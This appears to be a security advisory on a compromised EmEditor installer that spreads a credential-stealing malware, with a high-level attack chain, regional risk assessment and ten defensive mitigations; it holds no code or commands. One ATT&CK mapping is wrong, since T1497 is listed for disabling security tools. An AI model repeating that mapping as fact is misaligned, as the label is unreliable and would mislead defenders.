This threat involves a sophisticated watering hole attack targeting users of EmEditor, a popular text editor, by compromising its installer in a software supply chain attack discovered in late December 2025. The attackers replaced or injected malicious code into the EmEditor installer, which when executed, deploys multistage malware known as Evelyn Stealer. The malware leverages obfuscated PowerShell scripts to evade detection and uses geofencing techniques to restrict execution to specific geographic regions, indicating a likely Russian origin. Once executed, the malware disables security features such as antivirus or endpoint detection and response tools to maintain persistence and avoid removal. It collects detailed system information, including credentials and other sensitive data, and facilitates lateral movement within the victim’s network to expand its foothold. Data exfiltration is performed by sending stolen information to a remote command-and-control (C2) server. The attack chain demonstrates advanced tactics including credential dumping (T1003.001), system information discovery (T1082), disabling security tools (T1497), and use of obfuscated scripts (T1027). The campaign highlights the risks inherent in software supply chain compromises, where trusted software becomes a vector for malware delivery. The absence of affected version specifics suggests the compromised installer was distributed broadly. Indicators of compromise include multiple file hashes and suspicious domains related to the EmEditor download infrastructure. The attack underscores the importance of validating installer integrity, monitoring PowerShell usage, preserving endpoint telemetry for forensic analysis, and enforcing least privilege principles to limit malware impact. Software publishers are urged to secure their download infrastructure and prepare incident response plans to mitigate such supply chain threats.

For European organizations, this threat poses significant risks including credential theft, unauthorized access, data exfiltration, and potential disruption of business operations. Organizations relying on EmEditor for text editing and development tasks may inadvertently install compromised software, leading to widespread infection. The malware’s ability to disable security features and move laterally within networks increases the risk of broader compromise, potentially affecting sensitive data confidentiality and system integrity. Data exfiltration to external C2 servers could result in intellectual property loss, regulatory non-compliance (e.g., GDPR violations), and reputational damage. The geofencing technique may limit exposure to certain regions, but European entities remain at risk given the global distribution of EmEditor users. The attack also highlights vulnerabilities in software supply chains, which are critical to many European enterprises. The medium severity rating reflects a balance between the complexity of exploitation and the serious consequences of successful compromise. Organizations in sectors with high data sensitivity, such as finance, government, and critical infrastructure, face elevated risks.

1. Verify the integrity of EmEditor installers by checking digital signatures and hashes against official sources before installation or updates. 2. Restrict PowerShell execution policies and monitor PowerShell logs for suspicious or obfuscated script activity, using advanced endpoint detection tools. 3. Preserve comprehensive endpoint telemetry and enable detailed logging to facilitate incident detection and forensic investigations. 4. Enforce least privilege access controls to limit user and application permissions, reducing malware propagation potential. 5. Segment networks to contain lateral movement and isolate critical systems. 6. Employ multi-factor authentication to protect credentials and reduce the impact of credential theft. 7. Regularly update and patch all software, including EmEditor, once clean versions are available. 8. Secure software download infrastructure by implementing strong access controls, monitoring for unauthorized changes, and using secure delivery mechanisms such as code signing and trusted repositories. 9. Develop and rehearse incident response plans specifically addressing supply chain compromise scenarios. 10. Educate users about the risks of downloading software from unofficial sources and the importance of verifying software authenticity.